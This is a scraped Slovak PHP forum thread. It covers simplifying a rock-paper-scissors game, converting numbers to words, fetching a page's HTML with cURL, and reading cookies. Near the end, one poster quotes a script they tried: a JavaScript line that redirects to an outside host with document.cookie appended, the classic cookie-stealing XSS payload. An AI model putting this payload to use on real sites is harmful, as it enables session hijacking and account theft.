PS: A ak to podľa teba nie je jedno, tak napíš, prečo si to myslíš.
PHP Scripty
-
audiotrack
VIP
- Kontaktovať používateľa:
si smiešny. Veď výsledok hry závisý od jednej náhodnej veličiny (čo si "vybere" počítač) tak teda aj výsledok sám je úplne náhodný. Hru to nijak neovplyvní, a ak si myslíš že program musí pracovať tak ako si to užívateľ predstavuje, tak je to smiešne. Doležité je aby dosahoval očakávané výsledky a nie aby bol sprostý ako človek a nech sa k tým výsledkom dopracúva ťažkopádne v krokoch ktoré netreba.
Zachadzame do filozofickych rovin a oddialujeme sa od povodneho topicu.chrono napísal:PS: A ak to podľa teba nie je jedno, tak napíš, prečo si to myslíš.
Ale ked uz robim nejaky program - tak jedine tak aby splnil potrebne minimum a bol pre uzivatela maximalne pouzitelny.
V pripade hry - Kamen, Papier, Noznice - spravim program, ktory bude naozaj rollovat medzi tymto troma vecami, po rolle vypise co si vybral, vypise co som si vybral ja a vypise vysledok.
Programatorova potreba si veci uzasne zjednodusovat tu nema prioritu ak by tym mal utrpet samotny vysledok. A pri tom vasom "checku" by to utrpelo uz minimalne v tom, ze program by nevypisoval na zaklade COHO vlastne vyhral.
Snad chapete co chcem povedat.
Programator robi program pre pouzivatelov. Nie preto aby si dokazal ako v jednom riadku dokaze poriesit neviem ake algoritmy. Mate pravdu v tom, ze medzi povodnym kodom a tym vasim - novym nie je skoro ziaden rozdiel. Ale program prichadza o schopnost vypisat - co si vlastne vybral.
ta nehajme tuto debatu tak a napiste radsej ako by ste program zjednodusili bez toho ze mu useknete z nejakej "funkcionality".
-
audiotrack
VIP
použitelné to bude, dostaneš oznámené či si vyhral/prehral/remízoval, oznámi ti čo si vybral on, dokonca šance vyrhať/prehrať/remízovať sú rovnakéShakal napísal:Zachadzame do filozofickych rovin a oddialujeme sa od povodneho topicu.
Ale ked uz robim nejaky program - tak jedine tak aby splnil potrebne minimum a bol pre uzivatela maximalne pouzitelny.
to všetko predsa vypisuje aj terazShakal napísal:V pripade hry - Kamen, Papier, Noznice - spravim program, ktory bude naozaj rollovat medzi tymto troma vecami, po rolle vypise co si vybral, vypise co som si vybral ja a vypise vysledok.
to bola ukážka lebo nechápal, bolo jasne napísané že si tam ešte dorobí aby vypísalo ťah na základe toho aký bol výsledok a čo som dal jaShakal napísal:Programatorova potreba si veci uzasne zjednodusovat tu nema prioritu ak by tym mal utrpet samotny vysledok. A pri tom vasom "checku" by to utrpelo uz minimalne v tom, ze program by nevypisoval na zaklade COHO vlastne vyhral.
ano, robí ho pre užívatela, ale práve preto že užívatel nevie programovať tak mu do toho nemá čo kecať ako to má byť spravené. Vo výsledku nezbadá žiaden rozdielShakal napísal: Snad chapete co chcem povedat.
Programator robi program pre pouzivatelov. Nie preto aby si dokazal ako v jednom riadku dokaze poriesit neviem ake algoritmy. Mate pravdu v tom, ze medzi povodnym kodom a tym vasim - novym nie je skoro ziaden rozdiel. Ale program prichadza o schopnost vypisat - co si vlastne vybral.
ta nehajme tuto debatu tak a napiste radsej ako by ste program zjednodusili bez toho ze mu useknete z nejakej "funkcionality".
-
Blackshadow
Light Expert
zaujimavejsie to bude, ked si zvolite, ze napr, ked date
kamen - mate 60% sancu na vyhru
papier - 30% sancu na vyhru
noznice - 50% sancu na vyhru...
a podla toho generovat vysledok.. ale naco?
Inac, ked sme uz pri tom, rovno dajme:
Vysledok vlasatne ten isty, akurat netreba klikat na tlacitko 
Inac, ked sme uz pri tom, rovno dajme:
Kód: Vybrať všetko
$score = 0;
for($i=0;$i<=50;$i++) {
$a = mt_rand(-1,1);
$score = $score + $a;
}
echo 'Tvoje score je: '.$score;nestraca to vtedy tak trocha zmysel hry?Blackshadow napísal:zaujimavejsie to bude, ked si zvolite, ze napr, ked date
Inac, ked sme uz pri tom, rovno dajme:Vysledok vlasatne ten isty, akurat netreba klikat na tlacitkoKód: Vybrať všetko
$score = 0; for($i=0;$i<=50;$i++) { $a = mt_rand(-1,1); $score = $score + $a; } echo 'Tvoje score je: '.$score;
-
Blackshadow
Light Expert
Prezrel som si cely topic tento, a nenatrafil som na vec ktoru hladam. Hladam skript ktory vstupne cislo prepise slovami v slovenskom alebo anglickom jazyku.
Nieco som uz spravil, kus som upravil "DomCZo"ov script, ale nerobi mi to co ma. Transformuje mi cisla len od 1-9.
<?php
function Cislo_na_slovo($cislo)
{
$cisla_slovom = array("Jeden", "Dva", "Tri", "Styri", "Pat", "Sest", "Sedem", "Osem", "Devat", "Desat", "Jedenast", "Dvanast", "Trinast", "Strnast", "Patnast", "Sestast", "Sedemnast", "Osemnast", "Devatnast", "Dvadsat", "Dvadsatjeden", "Dvadsatdva", "Dvadsatri", "Dvadsatstyri");
return $cisla_slovom[$cislo-1];
}
$nejake_cislo = "23";
$vystupne_cislo = Cislo_na_slovo($nejake_cislo);
echo "Vstup: $nejake_cislo<br>\r\n";
echo "Výstup: $vystupne_cislo<br>\r\n";
?>
Samozrejme je aj iny sposob zrealizovania tejto ulohy, rad privitam nove napady
Dakujem vopred za pomoc.
Nieco som uz spravil, kus som upravil "DomCZo"ov script, ale nerobi mi to co ma. Transformuje mi cisla len od 1-9.
<?php
function Cislo_na_slovo($cislo)
{
$cisla_slovom = array("Jeden", "Dva", "Tri", "Styri", "Pat", "Sest", "Sedem", "Osem", "Devat", "Desat", "Jedenast", "Dvanast", "Trinast", "Strnast", "Patnast", "Sestast", "Sedemnast", "Osemnast", "Devatnast", "Dvadsat", "Dvadsatjeden", "Dvadsatdva", "Dvadsatri", "Dvadsatstyri");
return $cisla_slovom[$cislo-1];
}
$nejake_cislo = "23";
$vystupne_cislo = Cislo_na_slovo($nejake_cislo);
echo "Vstup: $nejake_cislo<br>\r\n";
echo "Výstup: $vystupne_cislo<br>\r\n";
?>
Samozrejme je aj iny sposob zrealizovania tejto ulohy, rad privitam nove napady
caute neviete mi poradit ako spravim scritp ktory mi nacita zdrojovy kod hocijakej stranky (myslim len html) cize napriklad by sa mi zobrazil na stranke kod www.google.sk (tak ako keby som klikol pravym a dal si zobrazit zdrojovy kod) dik
-
Blackshadow
Light Expert
vypisuje mi to Unable to access stranka... cize to nepojdeBlackshadow napísal:skus:
http://sk.php.net/manual/en/function.fi ... ntents.php
-
Blackshadow
Light Expert
Noo, zaujimave, tak skus toto:
ale asi len na PHP5 ti to pojde
function ziskajKod($URL)
{
$c = curl_init();
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_URL, $URL);
$contents = curl_exec($c);
curl_close($c);
if ($contents) return $contents;
else return FALSE;
}-
audiotrack
VIP
foreach($_COOKIE as $cookie=>$value) echo $cookie . " = " . $value . "<br />";a este by som sa chcel vediet ci je omzne pomocou javascriptu nejak vyberat jednotlybe polozky cookies nieco ako document.cookies len by som si ja urcil so chcem vybrat, preto ze som skusal jeden script na mojej stranke a to tak ze som mal na stranke
a na tej starnke sa mi ulozia do c polozky cookies len nejak mi to nefunguje...
<script>location.href ="http://daco.sk?c="+document.cookie</script>-
audiotrack
VIP
už som to sem dával asi 10 krát:
function getCookie(c_name)
{
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + "=");